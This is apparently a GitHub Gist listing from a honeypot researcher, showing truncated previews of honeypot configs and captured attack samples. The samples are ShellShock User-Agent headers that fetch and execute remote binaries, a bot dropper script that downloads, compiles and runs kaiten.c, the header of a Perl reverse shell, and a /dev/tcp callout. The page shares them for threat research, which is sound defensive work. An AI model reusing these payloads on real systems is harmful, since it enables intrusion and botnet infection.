# mongo
MongoDB shell version: 2.6.2
connecting to: test
> use hpfeeds
switched to db hpfeeds
> db.auth_key.find({"identifier": "mnemosyne"})
{ "_id" : ObjectId("XXXXXXXXXXXXXXXXX"), "identifier" : "mnemosyne", "subscribe" : [ "conpot.events", "thug.events", "beeswarm.hive", "dionaea.capture", "dionaea.connections", "thug.files", "beeswarn.feeder", "cuckoo.analysis", "kippo.sessions", "glastopf.events", "glastopf.files", "mwbinary.dionaea.sensorunique", "snort.alerts" ], "secret" : "YYYYYYYYYYYYYYYYYYYYYYYY", "publish" : [] }
Jason Trost jatrost
jatrost
/ dionaea_connections.py
Created
July 18, 2014 13:50
normalizer/modules/dionaea_connections.py patched to provide the honeypot's IP
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Copyright (C) 2013 Johnny Vestergaard <[email protected]> | |
| # | |
| # This program is free software; you can redistribute it and/or | |
| # modify it under the terms of the GNU General Public License | |
| # as published by the Free Software Foundation; either version 2 | |
| # of the License, or (at your option) any later version. | |
| # | |
| # This program is distributed in the hope that it will be useful, | |
| # but WITHOUT ANY WARRANTY; without even the implied warranty of | |
| # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
jatrost
/ dionaea.conf
Created
August 9, 2014 00:54
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logging = { | |
| default = { | |
| // file not starting with / is taken relative to LOCALESTATEDIR (e.g. /opt/dionaea/var) | |
| file = "/var/dionaea/log/dionaea.log" | |
| levels = "warning,error" | |
| domains = "*" | |
| } | |
| errors = { | |
| // file not starting with / is taken relative to LOCALESTATEDIR (e.g. /opt/dionaea/var) |
jatrost
/ create_timeshifted_pcap.sh
Last active
August 29, 2015 14:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ -z "$2" ] ; then | |
| echo "Usage: $0 <input> <output> [start-offset]" | |
| exit 1 | |
| fi | |
| START=$3 | |
| if [ -z "$3" ] ; then |
jatrost
/ wordpot-support-mnemosyne.md
Last active
August 29, 2015 14:06
jatrost
/ method.txt
Last active
August 29, 2015 14:06
IRC bot code being distributed by ShellShock, seen by our honeypots.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74[.]201[.]85[.]69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*" |
jatrost
/ regular.bot.sh
Created
September 28, 2014 19:38
regular.bot download from ShockPot honeypot downloaded from hxxp://stablehost[.]us/bots/regular.bot
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| killall perl | |
| wget http://stablehost.us/bots/kaiten.c -O /tmp/a.c; | |
| curl -o /tmp/a.c http://stablehost.us/bots/kaiten.c; | |
| gcc -o /tmp/a /tmp/a.c; | |
| /tmp/a; | |
| rm -rf /tmp/a.c; | |
| wget http://stablehost.us/bots/a -O /tmp/a; | |
| curl -o /tmp/a http://stablehost.us/bots/a; |
jatrost
/ 16fea67dfbcbdf04086ec3b3f0687b7b.pl
Last active
August 29, 2015 14:07
Shockpot captured Payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| # perl-reverse-shell - A Reverse Shell implementation in PERL | |
| # Copyright (C) 2006 [email protected] | |
| # | |
| # This tool may be used for legal purposes only. Users take full responsibility | |
| # for any actions performed using this tool. The author accepts no liability | |
| # for damage caused by this tool. If these terms are not acceptable to you, then | |
| # do not use this tool. | |
| # | |
| # In all other respects the GPL version 2 applies: |
jatrost
/ simple-vuln-tests.log
Last active
August 29, 2015 14:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| source_ip: 128.199.223.129 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi | |
| HTTP Headers: | |
| Host: XXX.XXX.XXX.XXX | |
| Content-Length: | |
| User-Agent: () { :;}; /bin/bash -c "sleep 2" | |
| Content-Type: text/plain | |
| source_ip: 128.199.223.129 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/test.cgi |
jatrost
/ outbound-network-tests.log
Last active
August 29, 2015 14:07
Simple vulnerability tests that caused outbound traffic
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| source_ip: 192.99.247.174 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/report.cgi | |
| HTTP Headers: | |
| Content-Length: | |
| Host: XXX.XXX.XXX.XXX | |
| User-Agent: () { :;}; /bin/bash -c "(echo 'GET /host/ad6a949e2c23b6fe51f0d3991b4a2375c2e7308a0e0f9f347c8c7947ebf7053d' > /dev/tcp/vulnerable.shellshocker.net/8000)" #Your system may be vulnerable to ShellShock. Please visit https://shellshocker.net/ for more information. | |
| Content-Type: text/plain | |
| source_ip: 37.48.65.71 | |
| url: http://XXX.XXX.XXX.XXX/test.cgi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| source_ip: 63.131.141.125 | |
| url: http://XXX.XXX.XXX.XXX/ | |
| HTTP Headers: | |
| Content-Length: | |
| Host: XXX.XXX.XXX.XXX | |
| User-Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*" | |
| Content-Type: text/plain | |
| source_ip: 63.131.141.125 | |
| url: http://XXX.XXX.XXX.XXX/cgi-bin/test.sh |